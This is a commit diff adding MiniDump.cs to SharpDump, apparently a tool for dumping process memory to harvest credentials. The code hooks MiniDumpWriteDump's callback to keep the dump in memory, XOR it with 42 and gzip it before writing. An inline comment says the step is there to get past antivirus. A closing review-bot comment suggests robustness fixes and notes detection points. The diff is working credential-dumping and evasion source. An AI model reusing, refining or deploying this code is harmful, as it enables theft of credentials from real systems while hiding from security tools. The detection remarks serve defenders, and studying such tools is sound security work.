
Commit f5e7cdc

committed
feat: gzip(xor(dmp,42)) in memory before touching disk
typo: match filename with the hint
fix: don't hardcode memory allocation
enhance: randomize filename
fix: ensure chunks are sorted by offset
1 parent 41cfcf9 commit f5e7cdc


4 files changed

+286
-62
lines changed


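--- a/SharpDump/MiniDump.cs
+++ b/SharpDump/MiniDump.cs
@@ -0,0 +1,177 @@
+using System;
+using System.Runtime.InteropServices;
+
+namespace SharpDump
+{
+class MiniDump
+{
+[StructLayout(LayoutKind.Sequential)]
+public struct MINIDUMP_IO_CALLBACK
+{
+public IntPtr Handle;
+public ulong Offset;
+public IntPtr Buffer;
+public uint BufferBytes;
+}
+
+[StructLayout(LayoutKind.Explicit)]
+public unsafe struct MINIDUMP_CALLBACK_UNION
+{
+[FieldOffset(0)]
+public MINIDUMP_IO_CALLBACK Io;
+
+[FieldOffset(0)]
+public fixed byte Padding[1296];
+}
+
+[StructLayout(LayoutKind.Explicit)]
+public unsafe struct MINIDUMP_CALLBACK_INPUT
+{
+[FieldOffset(0)]
+public uint ProcessId;
+
+[FieldOffset(4)]
+public IntPtr ProcessHandle;
+
+[FieldOffset(12)]
+public MINIDUMP_CALLBACK_TYPE CallbackType;
+
+[FieldOffset(16)]
+public MINIDUMP_CALLBACK_UNION Union;
+}
+
+[StructLayout(LayoutKind.Sequential)]
+public struct MINIDUMP_CALLBACK_OUTPUT
+{
+public HRESULT Status;
+}
+
+[StructLayout(LayoutKind.Sequential)]
+public struct MINIDUMP_CALLBACK_INFORMATION
+{
+public MINIDUMP_CALLBACK_ROUTINE CallbackRoutine;
+public IntPtr CallbackParam;
+}
+
+[Flags]
+public enum MINIDUMP_TYPE : uint
+{
+MiniDumpNormal = 0x00000000,
+MiniDumpWithDataSegs = 0x00000001,
+MiniDumpWithFullMemory = 0x00000002,
+MiniDumpWithHandleData = 0x00000004,
+MiniDumpFilterMemory = 0x00000008,
+MiniDumpScanMemory = 0x00000010,
+MiniDumpWithUnloadedModules = 0x00000020,
+MiniDumpWithIndirectlyReferencedMemory = 0x00000040,
+MiniDumpFilterModulePaths = 0x00000080,
+MiniDumpWithProcessThreadData = 0x00000100,
+MiniDumpWithPrivateReadWriteMemory = 0x00000200,
+MiniDumpWithoutOptionalData = 0x00000400,
+MiniDumpWithFullMemoryInfo = 0x00000800,
+MiniDumpWithThreadInfo = 0x00001000,
+MiniDumpWithCodeSegs = 0x00002000,
+MiniDumpWithoutAuxiliaryState = 0x00004000,
+MiniDumpWithFullAuxiliaryState = 0x00008000,
+MiniDumpWithPrivateWriteCopyMemory = 0x00010000,
+MiniDumpIgnoreInaccessibleMemory = 0x00020000,
+MiniDumpWithTokenInformation = 0x00040000,
+MiniDumpValidTypeFlags = 0x0007ffff
+}
+
+[Flags]
+public enum MINIDUMP_CALLBACK_TYPE : uint
+{
+ModuleCallback = 0,
+ThreadCallback = 1,
+ThreadExCallback = 2,
+IncludeThreadCallback = 3,
+IncludeModuleCallback = 4,
+MemoryCallback = 5,
+CancelCallback = 6,
+WriteKernelMinidumpCallback = 7,
+KernelMinidumpStatusCallback = 8,
+RemoveMemoryCallback = 9,
+IncludeVmRegionCallback = 10,
+IoStartCallback = 11,
+IoWriteAllCallback = 12,
+IoFinishCallback = 13,
+ReadMemoryFailureCallback = 14,
+SecondaryFlagsCallback = 15
+}
+
+[Flags]
+public enum HRESULT : uint
+{
+S_OK = 0,
+S_FALSE = 1
+}
+
+// partially adapted from https://blogs.msdn.microsoft.com/dondu/2010/10/24/writing-minidumps-in-c/
+[DllImport(
+"dbghelp.dll",
+EntryPoint = "MiniDumpWriteDump",
+CallingConvention = CallingConvention.StdCall,
+CharSet = CharSet.Unicode,
+ExactSpelling = true,
+SetLastError = true)]
+public static extern bool MiniDumpWriteDump(
+IntPtr hProcess,
+uint ProcessId,
+IntPtr hFile,
+MINIDUMP_TYPE DumpType,
+IntPtr ExceptionParam,
+IntPtr UserStreamParam,
+MINIDUMP_CALLBACK_INFORMATION CallbackParam);
+
+[UnmanagedFunctionPointer(CallingConvention.StdCall)]
+public unsafe delegate bool MINIDUMP_CALLBACK_ROUTINE(
+IntPtr CallbackParam,
+MINIDUMP_CALLBACK_INPUT* CallbackInput,
+MINIDUMP_CALLBACK_OUTPUT* CallbackOutput);
+
+public unsafe static bool Callback(
+IntPtr CallbackParam,
+MINIDUMP_CALLBACK_INPUT* CallbackInput,
+MINIDUMP_CALLBACK_OUTPUT* CallbackOutput)
+{
+switch (CallbackInput->CallbackType)
+{
+case MINIDUMP_CALLBACK_TYPE.IoStartCallback:
+CallbackOutput->Status = HRESULT.S_FALSE;
+break;
+
+case MINIDUMP_CALLBACK_TYPE.IoWriteAllCallback:
+CallbackOutput->Status = HRESULT.S_OK;
+
+uint len = CallbackInput->Union.Io.BufferBytes;
+IntPtr destination = Marshal.AllocHGlobal((int)len);
+
+// copy the current chunk
+Buffer.MemoryCopy((byte*)CallbackInput->Union.Io.Buffer, (byte*)destination, len, len);
+
+/*
+* We can do an extra transformation at this stage, like XOR-encrypt
+* the MiniDump before compressing it and writing it to disk.
+* This can be useful if gzip compression alone turns out to be
+* useless against AV.
+*
+* Example:
+*/
+for (int i = 0; i < len; i++)
+((byte*)destination)[i] ^= 42;
+
+Globals.Chunks.Add((destination, (int)len, (int)CallbackInput->Union.Io.Offset));
+break;
+
+case MINIDUMP_CALLBACK_TYPE.IoFinishCallback:
+CallbackOutput->Status = HRESULT.S_OK;
+break;
+
+default:
+break;
+}
+return true;
+}
+}
+}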
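Review bot: In `Callback`, the `IoWriteAllCallback` branch narrows `BufferBytes` (uint) and `Io.Offset` (ulong) to `int` with plain casts, so unless the project builds with checked arithmetic a value above `int.MaxValue` wraps silently before it reaches `Marshal.AllocHGlobal` and `Globals.Chunks`; use `checked((int)len)` and `checked((int)CallbackInput->Union.Io.Offset)`, or keep the native widths in the tuple. The `AllocHGlobal` buffer is handed to `Globals.Chunks` with no matching `Marshal.FreeHGlobal` visible in this file, so a comment at the `Add` call should state who owns and releases `destination`. `[Flags]` on `MINIDUMP_CALLBACK_TYPE` and `HRESULT` misdescribes enums whose members are sequential values rather than bit masks and should be dropped from both. The block comment calls the `^= 42` loop "XOR-encrypt", but a fixed single-byte XOR is reversible encoding that gives the copied memory no confidentiality, and the comment should say that. Read as a detection case, the commit title implies the file written to disk no longer carries a recognisable minidump header, so monitoring has to rest on the handle access to the dumped process and the dbghelp `MiniDumpWriteDump` call rather than on file content.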
